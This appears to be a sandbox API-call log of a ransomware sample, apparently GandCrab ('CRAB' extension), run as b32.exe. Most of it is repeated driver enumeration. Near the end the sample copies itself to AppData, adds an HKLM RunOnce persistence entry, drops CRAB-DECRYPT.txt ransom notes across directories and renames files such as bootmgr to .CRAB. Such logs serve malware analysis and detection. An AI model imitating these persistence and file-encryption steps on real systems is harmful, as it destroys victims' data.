Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Driver Get Name load_address = 52051968 True 1
Fn
Driver Get Name load_address = 52174848 True 1
Fn
Driver Get Name load_address = 50331648 True 1
Fn
Driver Get Name load_address = 50515968 True 1
Fn
Driver Get Name load_address = 50831360 True 1
Fn
Driver Get Name load_address = 69742592 True 1
Fn
Driver Get Name load_address = 70422528 True 1
Fn
Driver Get Name load_address = 70467584 True 1
Fn
Driver Get Name load_address = 70668288 True 1
Fn
Driver Get Name load_address = 70742016 True 1
Fn
Driver Get Name load_address = 71630848 True 1
Fn
Driver Get Name load_address = 72257536 True 1
Fn
Driver Get Name load_address = 2009399296 True 1
Fn
Driver Get Name load_address = 1210908672 True 1
Fn
Driver Get Name load_address = 4294377472 True 1
Fn
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 4128768 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, type = size True 1
Fn
Driver Enumerate load_addresses = 1638000 True 1
Fn
Driver Enumerate load_addresses = 178257920 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Driver Get Name load_address = 52051968 True 1
Fn
Driver Get Name load_address = 52174848 True 1
Fn
Driver Get Name load_address = 50331648 True 1
Fn
Driver Get Name load_address = 50515968 True 1
Fn
Driver Get Name load_address = 50831360 True 1
Fn
Driver Get Name load_address = 69742592 True 1
Fn
Driver Get Name load_address = 70422528 True 1
Fn
Driver Get Name load_address = 70467584 True 1
Fn
Driver Get Name load_address = 70668288 True 1
Fn
Driver Get Name load_address = 70742016 True 1
Fn
Driver Get Name load_address = 71630848 True 1
Fn
Driver Get Name load_address = 72257536 True 1
Fn
Driver Get Name load_address = 2009399296 True 1
Fn
Driver Get Name load_address = 1210908672 True 1
Fn
Driver Get Name load_address = 4294377472 True 1
Fn
Driver Enumerate load_addresses = 1638012 True 1
Fn
Driver Enumerate load_addresses = 178257920 True 1
Fn
Driver Get Name load_address = 42020864 True 1
Fn
Driver Get Name load_address = 48222208 True 1
Fn
Driver Get Name load_address = 12279808 True 1
Fn
Driver Get Name load_address = 13033472 True 1
Fn
Driver Get Name load_address = 13357056 True 1
Fn
Driver Get Name load_address = 13438976 True 1
Fn
Driver Get Name load_address = 13824000 True 1
Fn
Driver Get Name load_address = 15667200 True 1
Fn
Driver Get Name load_address = 16338944 True 1
Fn
Driver Get Name load_address = 16400384 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 14716928 True 1
Fn
Driver Get Name load_address = 14757888 True 1
Fn
Driver Get Name load_address = 14966784 True 1
Fn
Driver Get Name load_address = 15020032 True 1
Fn
Driver Get Name load_address = 15106048 True 1
Fn
Driver Get Name load_address = 15192064 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 15568896 True 1
Fn
Driver Get Name load_address = 12689408 True 1
Fn
Driver Get Name load_address = 15605760 True 1
Fn
Driver Get Name load_address = 12861440 True 1
Fn
Driver Get Name load_address = 12926976 True 1
Fn
Driver Get Name load_address = 17334272 True 1
Fn
Driver Get Name load_address = 17645568 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17727488 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18112512 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21909504 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21364736 True 1
Fn
Driver Get Name load_address = 23117824 True 1
Fn
Driver Get Name load_address = 25231360 True 1
Fn
Driver Get Name load_address = 25534464 True 1
Fn
Driver Get Name load_address = 25600000 True 1
Fn
Driver Get Name load_address = 25911296 True 1
Fn
Driver Get Name load_address = 25944064 True 1
Fn
Driver Get Name load_address = 26181632 True 1
Fn
Driver Get Name load_address = 26255360 True 1
Fn
Driver Get Name load_address = 26292224 True 1
Fn
Driver Get Name load_address = 26529792 True 1
Fn
Driver Get Name load_address = 26619904 True 1
Fn
Driver Get Name load_address = 27217920 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 27045888 True 1
Fn
Driver Get Name load_address = 21540864 True 1
Fn
Driver Get Name load_address = 27103232 True 1
Fn
Driver Get Name load_address = 27168768 True 1
Fn
Driver Get Name load_address = 21692416 True 1
Fn
Driver Get Name load_address = 21729280 True 1
Fn
Driver Get Name load_address = 21766144 True 1
Fn
Driver Get Name load_address = 21811200 True 1
Fn
Driver Get Name load_address = 22904832 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 56885248 True 1
Fn
Driver Get Name load_address = 57446400 True 1
Fn
Driver Get Name load_address = 57729024 True 1
Fn
Driver Get Name load_address = 57765888 True 1
Fn
Driver Get Name load_address = 57921536 True 1
Fn
Driver Get Name load_address = 57982976 True 1
Fn
Driver Get Name load_address = 58093568 True 1
Fn
Driver Get Name load_address = 58175488 True 1
Fn
Driver Get Name load_address = 58507264 True 1
Fn
Driver Get Name load_address = 58556416 True 1
Fn
Driver Get Name load_address = 58601472 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 18579456 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 60964864 True 1
Fn
Driver Get Name load_address = 61112320 True 1
Fn
Driver Get Name load_address = 61181952 True 1
Fn
Driver Get Name load_address = 61681664 True 1
Fn
Driver Get Name load_address = 61771776 True 1
Fn
Driver Get Name load_address = 61837312 True 1
Fn
Driver Get Name load_address = 61927424 True 1
Fn
Driver Get Name load_address = 62074880 True 1
Fn
Driver Get Name load_address = 62124032 True 1
Fn
Driver Get Name load_address = 62316544 True 1
Fn
Driver Get Name load_address = 62427136 True 1
Fn
Driver Get Name load_address = 62562304 True 1
Fn
Driver Get Name load_address = 62668800 True 1
Fn
Driver Get Name load_address = 62713856 True 1
Fn
Driver Get Name load_address = 62775296 True 1
Fn
Driver Get Name load_address = 62836736 True 1
Fn
Driver Get Name load_address = 63029248 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63377408 True 1
Fn
Driver Get Name load_address = 63746048 True 1
Fn
Driver Get Name load_address = 63832064 True 1
Fn
Driver Get Name load_address = 64208896 True 1
Fn
Driver Get Name load_address = 64458752 True 1
Fn
Driver Get Name load_address = 64598016 True 1
Fn
Driver Get Name load_address = 64622592 True 1
Fn
Driver Get Name load_address = 64679936 True 1
Fn
Driver Get Name load_address = 64729088 True 1
Fn
Driver Get Name load_address = 64774144 True 1
Fn
Driver Get Name load_address = 524288 True 1
Fn
Driver Get Name load_address = 64851968 True 1
Fn
Driver Get Name load_address = 5636096 True 1
Fn
Driver Get Name load_address = 64901120 True 1
Fn
Driver Get Name load_address = 6291456 True 1
Fn
Driver Get Name load_address = 8388608 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 62971904 True 1
Fn
Driver Get Name load_address = 63008768 True 1
Fn
Driver Get Name load_address = 62844928 True 1
Fn
Driver Get Name load_address = 26816512 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 26959872 True 1
Fn
Driver Get Name load_address = 18735104 True 1
Fn
Driver Get Name load_address = 51228672 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe, size = 323593 True 1
Fn
Data
Module Unmap process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x760edf04 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = wuexvswrvdz, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe", size = 136, type = REG_SZ True 1
Fn
Thread 0xbb0
8380 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-3388679973-3930757225-3770151564-1000\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Config.Msi\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Config.Msi\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\MSOCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\MSOCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\Microsoft SQL Server Compact Edition\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\Microsoft SQL Server Compact Edition\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\Desktop\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi, destination_filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\boot.sdi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
